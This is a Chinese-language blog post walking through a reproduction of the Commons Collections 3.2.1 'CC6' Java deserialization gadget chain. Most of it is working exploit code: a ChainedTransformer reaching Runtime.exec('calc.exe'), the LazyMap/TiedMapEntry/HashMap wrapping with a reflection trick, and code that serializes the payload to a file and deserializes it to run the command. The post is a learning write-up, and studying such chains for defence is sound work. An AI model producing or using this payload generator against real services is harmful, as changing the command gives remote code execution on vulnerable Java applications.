cc6复现

CC6复现及其总结

CCMaven依赖commons-collections

xml 复制代码
<dependencies>
    <dependency>
        <groupId>commons-collections</groupId>
        <artifactId>commons-collections</artifactId>
        <version>3.2.1</version>
    </dependency>
</dependencies>

利用终点

InvokerTransformertransform方法

CC链构造过程

格式a:funa-->b:funba类的funa方法调用了b类的funb方法 调用链 起:HashMap:readObject()-->HashMap:hash()-->TiedMapEntry:hashCode()-->TiedMapEntry:getValue-->LazyMap:get-->ChainedTransformer:transform-->InvokerTransformer:transform:终

终点构造

由于Runtime类不支持序列化,在cc链中获取的是Class对象,所以,以此例子,使用runtime.class的Class对象,来理解cc链中的终点构造

原理就是多次调用,通过反射,进行自动创建runtime对象 这里只是举例,以此理解runtime对象在程序执行过程中自动创建的过程 Class对象理解起来就是包裹普通class的容器,是用于实现程序运行时修改事物的一种机制,俗话说------叫反射,对应着Class.java类

java 复制代码
public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException {
    String[] strings = {"calc.exe"};
    Class[] classes = {String.class};
    //      Runtime.Class对象的Class
    Class runtimeClass_Class = Runtime.class.getClass();
    //      获取Class对象的getMethod方法
    Method getMethod = runtimeClass_Class.getMethod("getMethod", String.class, Class[].class);
    //      执行getMethod获取getRuntime方法
    Method getRuntime = (Method) getMethod.invoke(Runtime.class,"getRuntime",null);
    //      执行getRuntime创建Runtime对象
    Runtime runtime = (Runtime) getRuntime.invoke("getRuntime",null);
    //      终点执行
    InvokerTransformer invokerTransformer = new InvokerTransformer("exec", classes, strings);
    invokerTransformer.transform(runtime);
}

上层构造

ChainedTransformer构造

通过多次调用InvokerTransformer构造方法,实现runtime对象的自动创建

java 复制代码
//      用于循环的数组
Transformer[] transformers = new Transformer[]{
    //          返回Runtime.class对象
    new ConstantTransformer(Runtime.class),
    //          返回getruntime对象
    new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
    //          返回runtime对象
    new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{"getRuntime",null}),
    //          exec方法终点构造
    new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
};

ChainedTransformer chainedTransformer =new ChainedTransformer(transformers);
// 用与测试构造是否有效
chainedTransformer.transform(1);

最终poc

java 复制代码
// 用于循环的数组
Transformer[] transformers = new Transformer[]{
    //  返回Runtime.class对象
    new ConstantTransformer(Runtime.class),
    //  返回getruntime对象
    new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
    //  返回runtime对象
    new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[]{"getRuntime",null}),
    //  终点构造
    new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc.exe"})
};

ChainedTransformer chainedTransformer =new ChainedTransformer(transformers);

// 实例化LazyMap,并包裹chainedTransformer
// 不直接赋值为chainedTransformer
Map lazyMap = LazyMap.decorate(new HashMap(), new ConstantTransformer(null));
// 实例化TiedMapEntry,并包裹lazyMap
TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "key");
// 实例化HashMap,并将TiedMapEntry作为Key进行处理
Map<Object, Object> map = new HashMap<>();
map.put(tiedMapEntry, "abab");
// 反射修改lazyMap的factory属性
Class clazz = lazyMap.getClass();
Field factory = clazz.getDeclaredField("factory");
factory.setAccessible(true);
// 重新为其赋值为chainedTransformer
factory.set(lazyMap, chainedTransformer);
// 删除key
lazyMap.remove("key");

构造解释:

  • 由于exec方法返回的是Process接口的ProcessImpl的实现类,所以不能让exec执行
  • 所以在lazyMap中不直接放chainedTransformer只放一个普通的ConstantTransformer(null)使得chainedTransformer.transform不会执行,进而不会执行exec 使用反射修改lazyMap的factory值为chainedTransformer 执行,直接报错 debug跟踪,发现lazymap中的get方法,比较了key是否为空

再反射修改后,直接removekey:lazyMap.remove("your key") 然后运行,没有报错

序列化

直接序列化,创建序列文件,文件名任意,后缀任意,反正都是二进制

java 复制代码
ObjectOutputStream objectOutputStream = new ObjectOutputStream(Files.newOutputStream(Paths.get("cc6.ser")));
objectOutputStream.writeObject(map);
objectOutputStream.close();

反序列化测试,直接成功,弹出计算器

java 复制代码
ObjectInputStream objectInputStream = new ObjectInputStream(Files.newInputStream(Paths.get("cc6.ser")));
objectInputStream.readObject();
objectInputStream.close();

至此结束,复现over

相关推荐
望获linux1 小时前
【实时Linux实战系列】CPU 隔离与屏蔽技术
java·linux·运维·服务器·操作系统·开源软件·嵌入式软件
JosieBook1 小时前
【Java编程动手学】使用IDEA创建第一个HelloJava程序
java·开发语言·intellij-idea
Thomas_YXQ1 小时前
Unity3D DOTS场景流式加载技术
java·开发语言·unity
summer夏1231 小时前
2025.07 做什么
java·android studio
钢铁男儿2 小时前
C# 委托(调用带引用参数的委托)
java·mysql·c#
Apex Predator2 小时前
windows安装maven环境
java·maven
Bug退退退1232 小时前
RabbitMQ 工作模式
java·分布式·rabbitmq
很小心的小新3 小时前
12、jvm运行期优化
java·开发语言·jvm·笔记
hanniuniu133 小时前
AI时代API挑战加剧,API安全厂商F5护航企业数字未来
人工智能·安全
zhulangfly3 小时前
API接口安全-1:身份认证之传统Token VS JWT
安全